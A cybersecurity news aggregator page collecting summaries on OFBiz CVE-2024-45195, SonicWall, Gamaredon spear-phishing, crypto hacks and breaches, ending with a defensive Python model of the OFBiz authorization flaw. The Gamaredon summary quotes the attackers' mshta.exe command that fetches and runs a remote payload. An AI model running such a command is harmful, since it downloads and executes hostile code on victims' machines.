Server-Side Request Forgery (SSRF), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.16. Users are recommended to upgrade to version 18.12.16, which fixes the issue.

Security News

The latest news for cybersecurity, collected from a wide range of security websites.

grep Has Leaked The Heritage Foundation Database that was Breached by SiegedSec

by Dark Web Informer

This daily article is intended to make it easier for those who want to stay updated with my regular posts. Any subscriber-only content will be clearly marked at the end of the link.

by Dark Web Informer

2024-09-07 21:53:14

XSS Payload List

by Dark Web Informer

reconFTW: The Ultimate Tool for Automated Domain Reconnaissance and Vulnerability Scanning

by Dark Web Informer

A Threat Actor Allegedly Has Leaked the Database to Indian Academy of Pediatrics

by Dark Web Informer

Sorillus v7.2: Remote Administration Tool (RAT) Demonstration

by Dark Web Informer

2024-09-07 17:28:54

Ransomware Feed

Ransomware.live provides detailed insights into recent victims, high-profile attacks in the press, ransomware groups, negotiation chats, comprehensive statistics, victims categorized by country, and cartographic visualizations of global incidents.

by Dark Web Informer

888 Has Allegedly Leaked the Muzu.co Database

by Dark Web Informer

A Threat Actor is Allegedly Selling Access to an Unidentified Dutch Company

by Dark Web Informer

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Draytek VigorConnect and Kingsoft WPS Office bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Draytek VigorConnect and Kingsoft WPS Office vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these vulnerabilities: At the end of August, […]

by Security Affairs

The 6 Different Types of Hackers

by Dark Web Informer

A Threat Actor is Allegedly Selling Singapore Citizens Leads

by Dark Web Informer

A Threat Actor has Allegedly Leaked the Database of SmilePath Australia

by Dark Web Informer

Today's scams can be as simple as picking up a phone call. To avoid the next fraud, there are good reasons to let your calls run to voicemail.

by TechCrunch

Threat actors affiliated with North Korea have been observed leveraging LinkedIn as a way to target developers as part of a fake job recruiting operation. These attacks employ coding tests as a common initial infection vector, Google-owned Mandiant said in a new report about threats faced by the Web3 sector. "After an initial chat conversation, the attacker sent a ZIP file that contained

by The Hacker News

Two men have been indicted in the U.S. for their alleged involvement in managing a dark web marketplace called WWH Club that specializes in the sale of sensitive personal and financial information. Alex Khodyrev, a 35-year-old Kazakhstan national, and Pavel Kublitskii, a 37-year-old Russian national, have been charged with conspiracy to commit access device fraud and conspiracy to commit wire

by The Hacker News

Plus: Kaspersky’s US business sold, Nigerian sextortion scammers jailed, and Europe’s controversial encryption plans return.

by WIRED Security News

A critical flaw in the LiteSpeed Cache plugin for WordPress could allow unauthenticated users to take control of arbitrary accounts. The LiteSpeed Cache plugin is a popular caching plugin for WordPress that accounts for over 5 million active installations. The plugin offers site acceleration through server-level caching and various optimization features. The LiteSpeed Cache plugin […]

by Security Affairs

The data skills gap is costing businesses significant productivity, with employees losing 26 working days annually, a Multiverse report finds. Companies are prioritizing upskilling efforts to bridge this gap and improve data competency.

by ITPro Today

The United States Attorney for the Southern District of New York announced the unsealing of a three-count criminal indictment against Michael Smith, a North Carolina musician. The indictment charged Smith with wire fraud, wire fraud conspiracy, and money laundering conspiracy for allegedly using artificial intelligence (AI) tools and thousands of bots to fraudulently stream songs billions of times to obtain more than $10 million in undeserved royalty payments.

Michael Smith Exploited AI-Generated Songs

According to the unsealed indictment, 52-year-old Michael Smith used hundreds of thousands of AI-generated songs, streamed continuously on platforms such as Amazon Music, Apple Music, Spotify, and YouTube Music, to manipulate streaming numbers. He partnered with the CEO of an unnamed AI music company, who supplied him with thousands of tracks per month in exchange for a cut of the streaming revenue. Smith then deployed thousands of automated bot accounts to continuously stream these AI-generated songs, avoiding detection and claiming over $10 million in royalty payments. The songs were given randomly generated names and artist identities to make them appear as if they were created by real artists rather than AI. Smith has been charged with wire fraud conspiracy, wire fraud, and money laundering conspiracy, each of which carries a maximum sentence of 20 years in prison. The case is being prosecuted by the Office's Complex Frauds and Cybercrime Unit, and the FBI has praised the work of the investigators in uncovering this sophisticated scheme.

Crackdown on Fraudulent Streaming Practices

The case against Michael Smith is part of a broader effort by authorities to combat the growing problem of fraudulent streaming practices. Earlier this year, a man in Denmark was sentenced to 18 months in prison for a similar scheme. Music streaming platforms, such as Spotify, Apple Music, and YouTube, have also taken steps to address the issue, including changes to their royalty policies and increased efforts to detect and prevent artificial stream inflation. The music industry has seen a growing backlash, with artists signing open letters calling for an end to the predatory use of AI in the industry. The charges against Michael Smith represent a significant step in the fight against the misuse of AI technology in the music industry. As the case unfolds, it will likely have far-reaching implications, serving as a warning to those who seek to exploit the system and a call to action for the industry to address the challenges posed by the rise of AI-generated music. The outcome of this case will be closely watched as the music industry and streaming platforms navigate the complex landscape of recent technological advancements.

by The Cyber Express

Pavel Durov, a Russian-born billionaire and the founder of Telegram, has issued public statements for the first time since his detention in France last month, denying claims that the messaging app functions as an 'anarchic paradise' for cybercriminal activity. Durov was arrested amid an investigation into crimes related to child sexual abuse images, drug trafficking, and fraudulent transactions associated with the app. However, he has also pledged to overhaul the platform's much-criticized moderation policies.

Pavel Durov's Detention for Telegram Related Charges

Durov, who holds French citizenship, was detained in late August amid an investigation into alleged crimes on Telegram. While he managed to avoid jail time, Durov was released on a €5 million bail and ordered to report to police twice a week while remaining in France. Durov has since criticized the decision of the French authorities to detain him, believing that they should have approached the company with these complaints rather than charging him personally. He argues that using laws from the pre-smartphone era to charge a CEO with crimes committed by third parties on the platform is a misguided approach. Durov pointed out that Telegram has an official representative for the EU region to accept and reply to requests, and that the French authorities had access to a hotline he had helped set up. He believes that the established standard practice is to start a legal action against the service itself, rather than targeting the CEO. In a lengthy statement posted to his Telegram channel early Friday, Durov acknowledged that the platform has struggled to keep pace with its rapid growth, which has reached nearly 1 billion users, making it easier for criminals to exploit its services. "While 99.999% of Telegram users have nothing to do with crime, the 0.001% involved in illicit activities create a bad image for the entire platform, putting the interests of our almost billion users at risk," Durov wrote.

Telegram's Principles and Moderation Efforts

Despite the criminal charges he faces, Durov defended Telegram's principles and its commitment to user privacy. He said the platform has consistently refused to comply with demands from authoritarian governments, such as when it refused to hand over encryption keys to enable surveillance in Russia, leading to a ban by the Russian government. "We are prepared to leave markets that aren't compatible with our principles, because we are not doing this for money," Durov wrote. "We are driven by the intention to bring good and defend the basic rights of people, particularly in places where these rights are violated," he added. Durov acknowledged that Telegram is not perfect and said the platform should improve its processes for handling law enforcement requests, mentioning that the platform removes millions of harmful posts and channels every day. "We've already started that process internally, and I will share more details on our progress with you very soon," he added. He has pledged to revamp the company's moderation policies, including removing features linked to illegal activity. The company has already taken steps to address these issues, including disabling new media uploads to its blogging tool Telegraph and removing its People Nearby feature. Despite the challenges, Durov expressed optimism that the recent events would ultimately strengthen Telegram and the social media industry as a whole. "I hope that the events of August will result in making Telegram — and the social networking industry as a whole — safer and stronger," he said.

by The Cyber Express

This daily article is intended to make it easier for those who want to stay updated with my regular posts. Any subscriber-only content will be clearly marked at the end of the link.

by Dark Web Informer

Alleged Data Leak of Tourism Authority of Thailand

by Dark Web Informer

natohub has Allegedly Leaked Data Belonging to Euraxess Europe

by Dark Web Informer

A first in our telemetry: Chinese APT Stately Taurus uses Visual Studio Code to maintain a reverse shell in victims' environments for Southeast Asian espionage. The post Chinese APT Abuses VSCode to Target Government in Asia appeared first on Unit 42.

by Palo Alto Networks - Unit42

Car rental giant Avis disclosed a data breach that impacted one of its business applications in August, compromising customers' personal information. Car rental company Avis notified customers impacted in an August data breach. Threat actors breached one of its business applications and gained access to some of the customers' personal information. "We discovered on August […]

by Security Affairs

SonicWall has revealed that a recently patched critical security flaw impacting SonicOS may have come under active exploitation, making it essential that users apply the patches as soon as possible. The vulnerability, tracked as CVE-2024-40766, carries a CVSS score of 9.3 out of a maximum of 10. "An improper access control vulnerability has been identified in the SonicWall SonicOS management

by The Hacker News

A critical GeoServer vulnerability (CVE-2024-36401) is being actively exploited, allowing attackers to take control of systems for malware…

by Hackread

A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk. The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances. In

by The Hacker News

Threat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages. These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com). Adversaries targeting open-source repositories across

by The Hacker News

Analysis of a new phishing attack demonstrates how attackers may take a longer path to reach their malicious goals while staying “under the radar” of security products.

by KnowBe4

Learn about Mitiga’s fully-managed cloud detection and response service that operates 24/7.

by Mitiga

In the ever-evolving field of information security, curiosity and continuous learning drive innovation. 

by SpiderLabs Blog

In the past, Putin's Unit 29155 has utilized malware like WhisperGate to target organizations, particularly those in Ukraine.

by Dark Reading

The vulnerabilities affect industrial control tech used across the healthcare and critical manufacturing sectors.

by Dark Reading

Vendors of mercenary spyware tools used by nation-states to track citizens and enemies have gotten savvy about evading efforts to limit their use.

by Dark Reading

Recently fixed access control SonicOS vulnerability, tracked as CVE-2024-40766, is potentially exploited in attacks in the wild, SonicWall warns. SonicWall warns that a recently fixed access control flaw, tracked as CVE-2024-40766 (CVSS v3 score: 9.3), in SonicOS is now potentially exploited in attacks. “An improper access control vulnerability has been identified in the SonicWall SonicOS management […]

by Security Affairs

A misconfigured server from a US-based AI healthcare firm Confidant Health exposed 5.3 TB of sensitive mental health…

by Hackread

The US government will remove "unnecessary degree requirements" in favor of skills-based hiring to help fill 500,000 open cybersecurity jobs. The post US Gov Removing Four-Year-Degree Requirements for Cyber Jobs appeared first on SecurityWeek.

by SecurityWeek

Trend Micro has uncovered a new threat group, dubbed TIDRONE, targeting Taiwan's military and satellite industries, with a specific focus on drone manufacturers. This campaign employs advanced malware and espionage tactics, likely linked to a Chinese-speaking cyber espionage group. The TIDRONE campaign, active since early 2024, is suspected to be a supply chain attack, leveraging … The post TIDRONE Espionage Group Targets Taiwan's Military Drone Industry appeared first on CyberInsider.

by Cyber Insider

Kaspersky customers in the US can continue their existing subscriptions with a replacement product from the company's 'trusted partner'. Here's what to know.

by ZDNET Security

The Biden administration launches an initiative to encourage careers in cybersecurity, as businesses try new tactics to get unfilled IT security roles staffed.

by Dark Reading

An advisory for 18 patched flaws includes one that could enable “full system takeover,” researchers said.

by SC Media

2024-09-06 16:00:00

IP Addresses - SWN Vault

by SC Media

The company’s framing of AI personas offers a roadmap for nudging workers along to where managers want them to go in using new technologies.

by ITPro Today

Transport for London, the city's public transportation agency, revealed today that its staff has limited access to systems and email due to measures implemented in response to a Sunday cyberattack. [...]

by BleepingComputer

As many as 240 million Windows 10 PCs can't be upgraded to Windows 11. Instead of tossing your device when Windows 10 support runs out, here are five viable alternatives to save you money and avoid headaches.

by ZDNET Security

In August, Lowe's employees were the subject of a targeted campaign using fake ads and websites.

by ThreatDown

On September 5th, 2024, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) released a joint advisory about the cyber activities of a Russian cyber unit known as GRU Unit 29155 (161st Specialist Training Center) [1]. This group, part of the Russian military, has conducted espionage, sabotage, and reputational harm campaigns against various global targets since 2020. These operations, focused on critical infrastructure, aim to destabilize regions, disrupt services, and steal sensitive information, mainly through destructive malware closely associated with the group, such as WhisperGate.

by Picus Security

The 2024 State of the vCISO Report continues Cynomi’s tradition of examining the growing popularity of virtual Chief Information Security Officer (vCISO) services. According to the independent survey, the demand for these services is increasing, with both providers and clients reaping the rewards. The upward trend is set to continue, with even faster growth expected in the future. However,

by The Hacker News

In a brief update ahead of the weekend, the London transport network said it has no evidence yet that customer data was compromised.

by TechCrunch

While AI has huge potential to mitigate the environmental crisis, the technology that powers AI has a huge impact on climate change and water resources. Learn how the futures of AI and the green market revolution are intimately linked and how they will both become invisibly embedded into our daily lives.

by ITPro Today

by Mike Saunders, Principal Consultant. This blog is the twelfth in a series of blogs on obfuscation techniques for hiding shellcode. You can find the rest of the […]

by Red Siege Blog

The funds from Germany’s Sovereign Tech Fund will be used to integrate security features such as zero trust capabilities and tools for software bill of materials.

by Dark Reading

The WDTA framework spans the lifecycle of large language models, offering guidelines to manage integration with other systems.

by ZDNET Security

Security pros say this flaw could be integrated into a botnet, so teams should patch immediately.

by SC Media

American car rental giant Avis disclosed a data breach after attackers breached one of its business applications last month and stole customer personal information. [...]

by BleepingComputer

No organization can single-handedly defend against sophisticated attacks. Governments and private sector entities need to collaborate, share information, and develop defenses against cyber threats.

by Dark Reading

The US Department of Justice has named five Russian computer hackers as members of Unit 29155 – i.e., the 161st Specialist Training Center of the Russian General Staff Main Intelligence Directorate (GRU) – which it deems responsible for the 2022 WhisperGate wiper malware attacks on Ukrainian government organizations and critical infrastructure, and subsequently for computer network operations against NATO member and ally countries. "Since early 2022, the primary focus of the cyber actors appears to be … More → The post Exposed: Russian military Unit 29155 does digital sabotage, espionage appeared first on Help Net Security.

by Help Net Security

SonicWall is warning customers that the recently patched critical vulnerability CVE-2024-40766 may be exploited in the wild. The post Recent SonicWall Firewall Vulnerability Potentially Exploited in the Wild appeared first on SecurityWeek.

by SecurityWeek

DoJ seizes 32 Doppelgänger domains, Veeam releases fix for critical RCE flaw in backup product, and DPRK attackers exploit Chromium zero-day. The post The Good, the Bad and the Ugly in Cybersecurity – Week 36 appeared first on SentinelOne.

by SentinelOne

With the adoption of artificial intelligence (AI) soaring across industries and use cases, preventing AI-driven software supply chain attacks has never been more important. Recent research by SentinelOne exposed a new ransomware actor, dubbed NullBulge, which targets software supply chains by weaponizing code in open-source repositories like Hugging Face and GitHub. The group, claiming to […] The post How cyber criminals are compromising AI software supply chains appeared first on Security Intelligence.

by Security Intelligence

The spy agency that dared not speak its name is now the Joe Rogan of the SIGINT set. And the pod's actually worth a listen.

by WIRED Security News

Talos' Nick Biasini discusses the biggest shifts and trends in the threat landscape so far. We also focus on one state-sponsored actor that has been particularly active this year, and talk about why defenders need to be paying closer attention to infostealers.

by Cisco Talos Blog

Noteworthy stories that might have slipped under the radar: US Special Forces can hack buildings, X is hiring cybersecurity staff, and FTC warns of Bitcoin ATM scams. The post In Other News: US Army Hacks Buildings, X Hiring Cybersecurity Staff, Bitcoin ATM Scams appeared first on SecurityWeek.

by SecurityWeek

The decentralized finance (DeFi) ecosystem has been rocked by another major security breach. Penpie, a protocol built on the Pendle platform, suffered a hack on September 3, 2024. The protocol reported that the breach resulted in the theft of approximately $27 million worth of cryptocurrency. This Penpie DeFi hack adds to the already concerning rise in crypto scams, pushing total losses for 2024 past the staggering $1.2 billion mark.

Details of the Penpie DeFi Hack

The Penpie post-mortem report sheds light on some specifics of the exploit. It reveals that the attacker leveraged a vulnerability in Penpie's reward distribution mechanism. This vulnerability allowed the attacker to deploy a malicious smart contract, categorized as an "evil market," that inflated the attacker's staking balance on the platform. By manipulating this balance, the attacker could claim a significantly larger share of rewards than intended, ultimately draining millions of dollars worth of crypto assets. Following the hack, the blockchain suspended all deposits and withdrawals, effectively halting operations to prevent further losses. The team also filed complaints with both the Singapore police and the FBI. They also sent a message to the hacker promising a negotiated bounty payment in exchange for the safe return of funds. “We acknowledge your exploit of our protocol,” they wrote. “Please contact us to discuss terms confidentially. No legal action will be pursued if the funds are returned. Let’s find a mutually beneficial solution.”

[Image: Penpie's Appeal to Hacker. Source: X]

Euler Finance Cybercriminal Lauds Penpie Hacker

Soon after the incident, reports emerged that the Penpie hacker quickly moved a significant portion of the stolen funds – around $7 million – through the crypto mixer Tornado Cash. These mixers are designed to obfuscate the origin and destination of cryptocurrency transactions, making them a popular tool for criminals seeking to launder ill-gotten gains. Following the crypto hack, the infamous Euler Finance hacker, responsible for a $195 million DeFi heist in 2023, left a message on the blockchain. The message, directed at the Penpie hacker, expressed praise for their decision not to return the stolen funds. “Good job bro. I didn’t see a hack like this for a while. I’m happy you kept all the money and didn’t let these bastards get back one dollar of what you took. You won, they lost. Good job,” they wrote.

[Image: Cybercriminal Lauds Penpie Hacker. Source: X]

Over 9,000 Victims in August Due to Crypto Phishing Scams: Report

Unfortunately, the Penpie incident is just one in a series of major DeFi hacks in 2024. The cryptocurrency landscape continues to be plagued by cyberattacks, with the total value of stolen funds in 2024 surpassing $1.21 billion. This represents a 15.5% increase compared to the previous year, according to a report by Immunefi. The losses are spread across 154 separate incidents, with the majority occurring in the DeFi space. August 2024 was particularly alarming for crypto investors, as hackers exploited various vulnerabilities to steal millions of dollars. Two major attacks during this period resulted in the theft of approximately $238 million in Bitcoin and $55 million in Dai.

[Image: Source: Scam Sniffer Report]

Phishing scams also saw a significant surge in August, with Scam Sniffer reporting a 215% increase in stolen funds compared to the previous month. Over 9,000 victims fell prey to these scams, losing about $63 million. A single large-scale phishing attack accounted for the majority of these losses, with approximately $55 million stolen.

Regulation and the Future of DeFi

The increasing frequency of DeFi hacks has also sparked discussions surrounding potential regulations. While some advocate for a more hands-on approach from regulatory bodies, others argue that such measures may stifle innovation and the core principles of DeFi. Finding the right balance between security and innovation remains a challenge. However, it's clear that addressing security vulnerabilities will be essential for fostering long-term trust and stability in the DeFi ecosystem.

by The Cyber Express

After Office 2024 launches in October, Microsoft will disable ActiveX controls by default in Word, Excel, PowerPoint, and Visio client apps. [...]

by BleepingComputer

Cybersecurity researchers have discovered yet another critical security flaw in the LiteSpeed Cache plugin for WordPress that could allow unauthenticated users to take control of arbitrary accounts. The vulnerability, tracked as CVE-2024-44000 (CVSS score: 7.5), impacts versions before and including 6.4.1. It has been addressed in version 6.5.0.1. "The plugin suffers from an

by The Hacker News

We explore the opportunities and limitations of automated security assurance by taking a close look at GCP and Azure cloud reports for ISO 27001.

by ITPro Today

Modern browsers and web servers support many HTTP headers that can greatly improve web application security to protect against clickjacking, cross-site scripting, and other common types of attacks. This post provides an overview of best-practice HTTP security headers that you should be setting in your websites and applications and shows how to use DAST to make sure you’re doing it right. The post HTTP security headers: An easy way to harden your web applications appeared first on Invicti.

by Invicti

In 2020, according to population estimates from the U.S. Census Bureau, millennials surpassed Baby Boomers as the nation’s largest living adult generation. Millennials were heralded as digital natives, the first generation to grow up immersed in the digital world of the internet, smartphones, and social media. This has fundamentally shaped their communication, work habits, and lifestyles […] The post Gen Alpha: Navigating Cybersecurity in an AI-Native World appeared first on IT Security Guru.

by IT Security Guru

The latest Apache OFBiz update patches CVE-2024-45195, a bypass of a recently disclosed remote code execution bug exploited in attacks. The post Apache Makes Another Attempt at Patching Exploited RCE in OFBiz appeared first on SecurityWeek.

by SecurityWeek

A newly discovered Android malware named 'SpyAgent' is stealing sensitive cryptocurrency credentials using advanced image recognition technology. The malware, discovered by McAfee's Mobile Research Team, targets mnemonic keys used to recover crypto wallets by scanning images on infected devices. These 12-word phrases serve as a more user-friendly alternative to traditional, complex private keys, making their … The post New Android Malware SpyAgent Targets Crypto Wallets with Image Recognition appeared first on CyberInsider.

by Cyber Insider

Responding to the feedback we've received from our community of 2.9 million cybersecurity professionals, we're excited to share the new Hack The Box updates released over the past 3 months.

by Hack The Box Blog

Attackers operating under the direction of Russia’s military intelligence service are targeting governments, finance, transportation, energy and healthcare.

by Cybersecurity Dive

Roundup of the three dozen cybersecurity-related merger and acquisition (M&A) deals announced in August 2024. The post Cybersecurity M&A Roundup: 36 Deals Announced in August 2024 appeared first on SecurityWeek.

by SecurityWeek

A new Android malware named SpyAgent uses optical character recognition (OCR) technology to steal cryptocurrency wallet recovery phrases from screenshots stored on the mobile device. [...]

by BleepingComputer

A sophisticated spear-phishing campaign orchestrated by the Gamaredon APT group has emerged as a threat to Ukrainian military personnel. Cyble Research and Intelligence Labs (CRIL) has revealed this extensive operation, which capitalizes on spear-phishing emails to compromise sensitive military systems. Gamaredon, also known as Primitive Bear or Armageddon, is a Russian-affiliated Advanced Persistent Threat (APT) group with a long history of targeting Ukrainian government institutions and critical infrastructure. Active since at least 2013, Gamaredon has been notorious for its cyber-espionage activities. Despite the relatively low sophistication of their tools, the group's persistent focus on specific geopolitical targets has led to numerous successful attacks.

An Overview of the Gamaredon Campaign

The latest campaign by Gamaredon reflects an escalation in their tactics and scope. CRIL's recent analysis reveals that the group is employing spear-phishing emails to deliver malicious payloads aimed at Ukrainian military personnel, demonstrating a clear pattern of coordinated and large-scale cyberattacks.

[Image: Gamaredon Sample Observed in the Wild (Source: Cyble)]

The spear-phishing emails at the heart of this Gamaredon campaign are designed to deceive recipients into executing malicious files. The emails are themed around military summons, with subjects such as “ПОВІСТКА” (which translates to "summons"). Each email contains a malicious XHTML attachment, crafted to initiate a series of damaging actions when opened. Upon activation, the XHTML file executes obfuscated JavaScript code. This script, hidden within a div element with an id set to “jwu,” uses Base64 encoding and random characters to obscure its true intent. The obfuscation is a deliberate tactic to evade detection by security systems. The JavaScript code runs silently, downloading a RAR compressed folder into the victim's Downloads directory. This folder is designed to appear as a legitimate file, further tricking the user. The downloaded RAR file contains a Windows shortcut (LNK) file. When executed, this shortcut initiates the running of a remote .tar archive. The Gamaredon group has employed TryCloudflare's one-time tunnel feature to host these malicious files. By leveraging TryCloudflare, the attackers can use a temporary, anonymous tunnel to serve resources and deploy their payloads while evading traditional detection methods. The specific command executed by the LNK file is:

“C:\Windows\System32\mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f”

This command directs the system to retrieve and run the malicious .tar file from the TryCloudflare domain.

The Gamaredon Campaign's Scale and Impact

The ongoing Gamaredon campaign is notable for its large-scale and sophisticated execution. The frequency and volume of spear-phishing emails indicate a highly coordinated effort. The use of TryCloudflare's one-time tunnel feature highlights the group's ingenuity in circumventing traditional cybersecurity measures. A key component of this campaign is the inclusion of a 1-pixel remote image within the malicious files. This image acts as a tracking mechanism, allowing the attackers to monitor interactions with their phishing content and gauge the effectiveness of their attacks. While CRIL's investigation was unable to retrieve the contents of the .tar files, analyses from other cybersecurity experts, such as Cisco Talos, suggest that these archives likely contain additional malicious payloads designed to exfiltrate sensitive information from compromised systems.

Implications for Cybersecurity and Recommendations

To counteract sophisticated spear-phishing attacks, organizations, particularly those in sensitive sectors like the military, must adopt comprehensive cybersecurity strategies. First, user training is essential. Educating users on how to recognize spear-phishing attempts, especially those involving unexpected military-themed attachments or messages, is crucial. Awareness plays a significant role in reducing the success rate of such attacks. Advanced email security is another critical component. Implementing email security solutions with advanced threat protection capabilities helps filter out phishing emails and malicious attachments effectively. In addition, deploying robust anti-malware solutions is necessary. These tools should be capable of detecting and blocking obfuscated JavaScript code and malicious LNK files. Regular updates and scans are essential for maintaining protection against online threats. Network monitoring is also vital. Keeping an eye out for unusual network activity, such as connections to TryCloudflare's one-time tunnels or other unknown external resources, helps in the early detection of anomalies, which can prevent further infiltration. Application whitelisting should be used to allow only trusted applications and scripts to run on systems. This measure helps prevent the unauthorized execution of potentially harmful files. Lastly, leveraging threat intelligence platforms is important for blocking known malicious domains, including those abused by groups like Gamaredon. Staying updated with the latest threat intelligence provides an edge in preemptively countering cyberattacks. The Gamaredon campaign represents a significant escalation in cyber threats targeting Ukrainian military personnel. Through the use of spear-phishing emails, malicious XHTML attachments, and advanced evasion techniques like TryCloudflare's one-time tunnel feature, Gamaredon continues to refine and intensify its attacks. The persistence and scale of this campaign highlight the importance of maintaining vigilant and proactive cybersecurity measures.

by The Cyber Express

Sophos X-Ops explores the distribution and capabilities of the Atomic macOS Stealer (AMOS)

by Sophos News

Upgrade your security with 1Password, a premium password manager with useful features.

by ZDNET Security

Learn how to create a PowerShell script that can listen to your voice and respond with spoken words.

by ITPro Today

Marsh McLennan and Zurich Insurance Group issued a white paper urging a public-private partnership to help tackle a growing coverage gap. The White House is working on a plan. 

by Cybersecurity Dive

Veeam has released patches for critical-severity vulnerabilities in Backup & Replication, ONE, and Service Provider Console. The post Veeam Patches Critical Vulnerabilities in Enterprise Products appeared first on SecurityWeek.

by SecurityWeek

A new security flaw has been addressed in the Apache OFBiz open-source enterprise resource planning (ERP) system that, if successfully exploited, could lead to unauthenticated remote code execution on Linux and Windows. The high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5), affects all versions of the software before 18.12.16. "An attacker with no valid

by The Hacker News

Video and audio of therapy sessions, transcripts, and other patient records were accidentally exposed in a publicly accessible database operated by the virtual medical company Confidant Health.

by WIRED Security News

A vulnerability in the LiteSpeed Cache WordPress plugin leads to the exposure of sensitive information, including user cookies. The post LiteSpeed Cache Plugin Vulnerability Exposes Millions of WordPress Sites to Attacks appeared first on SecurityWeek.

by SecurityWeek

Popular open-source Enterprise Resource Planning (ERP) system Apache OFBiz was recently discovered to be harboring a critical Remote Code Execution (RCE) vulnerability. Tracked as CVE-2024-45195, the Apache OFBiz vulnerability could allow attackers to execute arbitrary code on vulnerable Linux and Windows servers running OFBiz. Thankfully, the Apache security team has addressed the issue in the latest update, urging users to patch their installations immediately.

Understanding the Apache OFBiz RCE Vulnerability (CVE-2024-45195)

The vulnerability, discovered by Rapid7 security researchers, stems from missing authorization checks within the OFBiz web application. This weakness, categorized as a forced browsing vulnerability, exposes restricted paths to unauthenticated direct request attacks. "An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server," explained security researcher Ryan Emmons in a report.

In simpler terms, an attacker could potentially exploit this vulnerability by crafting a specially designed URL that bypasses authentication protocols. If successful, this could grant the attacker the ability to execute malicious code on the server, potentially leading to complete system compromise.

Potential Consequences of the Exploit

The consequences of exploiting CVE-2024-45195 could be severe for organizations relying on OFBiz. Here are some potential risks:

- Data Theft and Leakage: Attackers could gain access to sensitive information stored on the server, including customer data, financial records, and intellectual property.
- Disruption of Operations: The execution of malicious code could disrupt critical business processes, leading to downtime and financial losses.
- Lateral Movement and Persistence: Exploiting this vulnerability could be a stepping stone for attackers to gain a foothold in the network and launch further attacks within the system.

Apache Patches Flaw

The Apache Software Foundation (ASF) has released a patch (version 18.12.16) that addresses CVE-2024-45195. This update strengthens the authorization checks within the OFBiz application, preventing unauthorized access to restricted paths.

Emmons explained that CVE-2024-45195 is a patch bypass for three other OFBiz vulnerabilities that have been addressed in the past few months and are tracked as CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856. CVE-2024-32113 had been exploited in attacks using the Mirai botnet, highlighting the serious risks associated with such flaws. Meanwhile, CVE-2024-38856 was rated with a CVSS score of 9.8 by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), classifying it as critical in severity. The vulnerability allowed attackers to execute remote code without prior authentication, posing a severe risk to affected systems.

"Based on our analysis, three of these vulnerabilities are, essentially, the same vulnerability with the same root cause," Emmons said. All of them are caused by a controller-view map fragmentation issue that enables attackers to execute code or SQL queries and achieve remote code execution without authentication. The latest patch "validates that a view should permit anonymous access if a user is unauthenticated, rather than performing authorization checks purely based on the target controller."

Importance of Security in Open-Source Software

The discovery of CVE-2024-45195 serves as a reminder of the importance of security in open-source software. While open-source tools offer numerous benefits, they also require consistent vigilance and patching to address vulnerabilities promptly. Users are responsible for keeping their deployments up-to-date and implementing additional security measures to mitigate risks.

The patching of CVE-2024-45195 is a positive step forward, but it's vital to remain vigilant. The ever-evolving cyber threat landscape necessitates continuous monitoring and proactive security measures. By implementing a comprehensive security strategy, organizations using OFBiz can minimize their attack surface and safeguard their critical data.
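To make the patch description above concrete, the following is a deliberately simplified model of the flaw class, written as an added illustration for this page; it is not OFBiz source code, and the request-map entries, view names (login, admin, adminConsole) and field names in it are hypothetical. The pre-fix dispatcher authorizes only the controller entry named in the request, so a restricted view reached by name through an unauthenticated entry point is rendered unchecked. The post-fix dispatcher additionally requires that the resolved view itself permit anonymous access when the user is unauthenticated, which is the behaviour the quoted patch description states.

```python
"""Simplified model of the view-authorization flaw class behind CVE-2024-45195.

Added illustration, not OFBiz source: the maps, names and checks here are
hypothetical and only mirror the patch description quoted above (validate that
the view permits anonymous access when the user is unauthenticated, instead of
checking the target controller alone).
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class View:
    name: str
    allow_anonymous: bool        # may an unauthenticated user render this view?


@dataclass(frozen=True)
class RequestMap:
    uri: str
    auth_required: bool          # the controller-level check
    default_view: str


@dataclass(frozen=True)
class Request:
    uri: str
    authenticated: bool
    view_override: Optional[str] = None   # a view named directly by the client


class Forbidden(Exception):
    """Raised when a dispatcher refuses to render the requested view."""


# Hypothetical controller entries and views (illustrative names only).
VIEWS = {
    "login": View("login", allow_anonymous=True),
    "adminConsole": View("adminConsole", allow_anonymous=False),
}
REQUESTS = {
    "login": RequestMap("login", auth_required=False, default_view="login"),
    "admin": RequestMap("admin", auth_required=True, default_view="adminConsole"),
}


def resolve_view(req: Request) -> View:
    """The view comes from the client's override when present, else from the map."""
    entry = REQUESTS[req.uri]
    return VIEWS[req.view_override or entry.default_view]


def dispatch_controller_only(req: Request) -> str:
    """Pre-fix behaviour: only the request-map entry is authorized, so a
    restricted view reached through an unauthenticated entry goes unchecked."""
    entry = REQUESTS[req.uri]
    if entry.auth_required and not req.authenticated:
        raise Forbidden(req.uri)
    return resolve_view(req).name


def dispatch_view_aware(req: Request) -> str:
    """Post-fix behaviour: an unauthenticated user may render only a view that
    explicitly allows anonymous access, whichever entry point was used."""
    entry = REQUESTS[req.uri]
    if entry.auth_required and not req.authenticated:
        raise Forbidden(req.uri)
    view = resolve_view(req)
    if not req.authenticated and not view.allow_anonymous:
        raise Forbidden(view.name)
    return view.name


def is_forbidden(dispatcher, req: Request) -> bool:
    """True when the given dispatcher refuses the request."""
    try:
        dispatcher(req)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    probe = Request("login", authenticated=False, view_override="adminConsole")
    print("controller-only renders:", dispatch_controller_only(probe))      # adminConsole
    print("view-aware forbids:", is_forbidden(dispatch_view_aware, probe))  # True
```
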